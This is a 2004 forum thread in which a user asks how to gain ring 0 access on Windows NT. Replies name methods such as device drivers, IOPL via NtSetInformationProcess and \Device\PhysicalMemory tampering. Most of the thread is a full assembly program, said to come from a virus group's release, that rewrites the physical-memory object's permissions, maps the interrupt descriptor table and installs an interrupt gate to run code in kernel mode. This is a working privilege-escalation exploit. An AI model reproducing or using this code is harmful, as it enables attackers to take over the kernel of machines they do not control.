Sorry to ask this question, I'm sure it has been up like a hundred times.. I have searched around on google for a while now, but I can't find any paper that show some methods to get ring 0 access in win nt.. Does anyone here have some links or know where I can get papers on that subject. I remember I had some info on this subject a while ago but then I formated my hdd so I don't have it anymore..
Posted on 2004-12-09 13:55:36 by dev_zero
You will need to learn how to create a device driver.
Read the Four-F tutorials at
http://www.freewebs.com/four-f/
Posted on 2004-12-09 14:10:27 by Opcode
Can you clarify your question? Do you want to get access to instructions from ring3 that are typically restricted to ring0? What type of code do you want to run at ring0?

You can use NtSetInformationProcess with the ProcessUserModeIOPL(16) PROCESSINFOCLASS to give you the ability to use restricted instructions/ports at ring3. This requires SeTcbPrivilege. (example: http://ry.pl/~omega/progs/DirectIO.rar).

You can open \Device\PhysicalMemory and twiddle things to grant you ring0 access from ring3 (example: http://www.phrack.org/show.php?p=59&a=16).

Or, you can write a device driver which is the cleanest way to do it. However, given that your motivations are unknown it is hard to recommend a particular solution.
Posted on 2004-12-09 14:13:17 by nohaven
I found this little "utility" in the latest release of 29a.. I'm trying to get a little more information on how you can to get to ring 0.. I have read about a method where they use the SIDT instruction to hook an interrupt and so on and I think I have found this method used in this application, but I can't get the program to work. I have tried debugging it with IDA but the whole computer shutsdown when the bluescreen comes.. Can somebody with some more knowledge help me figuring this one out..?
.386p

.model flat

extern GetModuleHandleA:proc
extern GetProcAddress:proc
extern LoadLibraryA:proc
extern FreeLibrary:proc
extern CloseHandle:proc
extern MapViewOfFile:proc
extern UnmapViewOfFile:proc
extern WriteFile:proc
extern ExitProcess:proc

OBJ_CASE_INSENSITIVE equ 40h
SECTION_MAP_WRITE equ 2
SECTION_MAP_READ equ 4
MEM_PRIVATE equ 20000h
MEM_MAPPED equ 40000h
DACL_SECURITY_INFORMATION equ 4
SE_KERNEL_OBJECT equ 6
GRANT_ACCESS equ 1
NO_MULTIPLE_TRUSTEE equ 0
TRUSTEE_IS_NAME equ 1
TRUSTEE_IS_USER equ 1
INTNUMBER equ 0ffh

.data
ntdll db "ntdll", 0
NtOpenSection db "NtOpenSection", 0
SetSecurityInfo db "SetSecurityInfo", 0
SetEntriesInAclA db "SetEntriesInAclA", 0
GetSecurityInfo db "GetSecurityInfo", 0
advapi32 db "advapi32", 0
object_name dw offset object_buffer_e1 - offset object_buffer, offset object_buffer_e2 - offset object_buffer
dd offset object_buffer
object_buffer dw '\', 'd', 'e', 'v', 'i', 'c', 'e', '\', 'p', 'h', 'y', 's', 'i', 'c', 'a', 'l', 'm', 'e', 'm', 'o', 'r', 'y'
object_buffer_e1 dw 0
object_buffer_e2 equ $
align 4 ;required for object_attributes
object_attributes dd offset object_attributes_e - offset object_attributes, 0, offset object_name, OBJ_CASE_INSENSITIVE, 0, 0
object_attributes_e equ $
explicit_access dd SECTION_MAP_WRITE, GRANT_ACCESS, 0, 0, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_NAME, TRUSTEE_IS_USER, offset current_user
current_user db "CURRENT_USER", 0
instaddr db 0ah dup (?)

.code
code_begin label near
push offset ntdll
call GetModuleHandleA
test eax, eax
je exit_code
push offset NtOpenSection
push eax
call GetProcAddress
xchg esi, eax
push eax
mov ebx, esp
mov edi, offset object_attributes
push edi
push SECTION_MAP_READ or SECTION_MAP_WRITE
push ebx
call esi
test eax, eax
jns hook_interrupt
push edi
push MEM_MAPPED or MEM_PRIVATE
push ebx
call esi
push eax
mov ebp, esp
xor eax, eax
push eax
push eax
mov ecx, esp
push eax
mov edx, esp
push eax
push DACL_SECURITY_INFORMATION
push SE_KERNEL_OBJECT
push dword ptr [ebx]
push offset SetSecurityInfo
push ecx
push edx
push offset explicit_access
push 1
push offset SetEntriesInAclA
push ebp
push eax
push edx
push eax
push eax
push DACL_SECURITY_INFORMATION
push SE_KERNEL_OBJECT
push dword ptr [ebx]
push offset GetSecurityInfo
push offset advapi32
call LoadLibraryA
push eax
xchg ebp, eax
call GetProcAddress
call eax
push ebp
call GetProcAddress
call eax
push ebp
call GetProcAddress
call eax
pop eax
push ebp
call FreeLibrary
push dword ptr [ebx]
call CloseHandle
push edi
push SECTION_MAP_READ or SECTION_MAP_WRITE
push ebx
call esi
test eax, eax
js exit_code

hook_interrupt label near
push eax
sidt fword ptr [esp - 2]
pop esi
btr esi, 1fh
push 1
push esi
push 0
push SECTION_MAP_WRITE
push dword ptr [ebx]
call MapViewOfFile
push eax
and esi, 0fffh
lea esi, dword ptr [eax + esi + INTNUMBER * 8]
fild qword ptr [esi]
call skip_ring0

;begin ring 0

mov ebp, cr0
iretd

;end ring 0

skip_ring0 label near
pop word ptr [esi]
mov byte ptr [esi + 2], 8
mov byte ptr [esi + 5], 0eeh
pop word ptr [esi + 6]
int INTNUMBER
fistp qword ptr [esi]
call UnmapViewOfFile
call CloseHandle
push 0
push esp
push size instaddr
mov edi, offset instaddr
push edi
push -11 ;STD_OUTPUT_HANDLE
call hex2asc ;convert offset to ASCII
mov ax, 0a0dh
stos word ptr [edi]
call WriteFile ;print to screen

exit_code label near
push 0
call ExitProcess

hex2asc proc near
call dd2asc

dd2asc proc near
call dw2asc

dw2asc proc near
shld eax, ebp, 8
shl ebp, 8
aam 10h
call db2asc

db2asc proc near
xchg ah, al
cmp al, 0ah
sbb al, 69h
das
stos byte ptr [edi]
ret
db2asc endp
dw2asc endp
dd2asc endp
hex2asc endp
end code_begin
Posted on 2004-12-09 15:14:04 by dev_zero
Read the article cited by nohaven:


You can open \Device\PhysicalMemory and twiddle things to grant you ring0 access from ring3 (example: http://www.phrack.org/show.php?p=59&a=16).


And read the Russinovich article:
http://www.sysinternals.com/ntw2k/info/tips.shtml#kmem
Posted on 2004-12-09 16:31:56 by Opcode